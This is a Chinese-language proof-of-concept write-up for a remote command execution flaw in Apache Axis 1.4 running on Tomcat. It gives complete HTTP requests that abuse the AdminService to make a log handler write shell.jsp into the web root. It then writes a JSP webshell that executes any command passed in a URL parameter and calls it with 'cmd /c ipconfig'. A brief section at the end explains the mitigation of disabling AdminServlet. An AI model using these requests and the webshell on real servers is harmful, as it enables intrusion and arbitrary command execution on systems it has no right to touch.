Axis <=1.4 远程命令执行(RCE) POC

环境准备

首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释

avatar

然后,server-config.wsdd文件开启enableRemoteAdmin (本地环境可以不管)
avatar
本人部署在tomcat8上

利用

第一步:

通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务。这里我们要写入的文件名是../webapps/ROOT/shell.jsp,服务模块的工作路径是bin目录,这里利用相对路径写入ROOT目录,也就是tomcat默认根目录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
POST /axis/services/AdminService HTTP/1.1
Host: localhost:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 1063

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<ns1:deployment
xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
xmlns:ns1="http://xml.apache.org/axis/wsdd/">
<ns1:service name="RandomService" provider="java:RPC">
<requestFlow>
<handler type="RandomLog"/>
</requestFlow>
<ns1:parameter name="className" value="java.util.Random"/>
<ns1:parameter name="allowedMethods" value="*"/>
</ns1:service>
<handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" >
<parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp" />
<parameter name="LogHandler.writeToConsole" value="false" />
</handler>
</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>

avatar

第二步

调用上一步创建的恶意webservice 写入webshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST /axis/services/RandomService HTTP/1.1
Host: localhost:8080
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 878

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<api:main
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
</api:in0>
</api:main>
</soapenv:Body>
</soapenv:Envelope>

返回500,不用管,但是文件已经创建成功了
avatar
看我们ROOT目录下shell文件,虽然有些错误,但是不影响,因为是log模式,有追加内容
avatar

第三步

执行shell.jsp

浏览器访问 http://localhost:8080/shell.jsp?c=cmd%20/c%20ipconfig

同样忽略网页报错
avatar
网页右键查看源码,可以看执行命令的结果。

avatar

python 脚本下载地址:
POC.

影响和修复

默认情况下service远程管理没开启,也即配置文件中enableRemoteAdmim为false,也就是只能本地localhost访问,这种情况下可以结合ssrf和xxe进行利用,所以比较鸡肋,但是安全无小事,对于命令执行漏洞还是应该重视。修复的话,关闭admin服务即可,具体方法注释掉web-inf/web.xml 里的AdminServlet,然后重启tomcat.

1
2
3
4
<servlet-mapping>
<servlet-name>AdminServlet</servlet-name>
<url-pattern>/servlet/AdminServlet</url-pattern>
</servlet-mapping>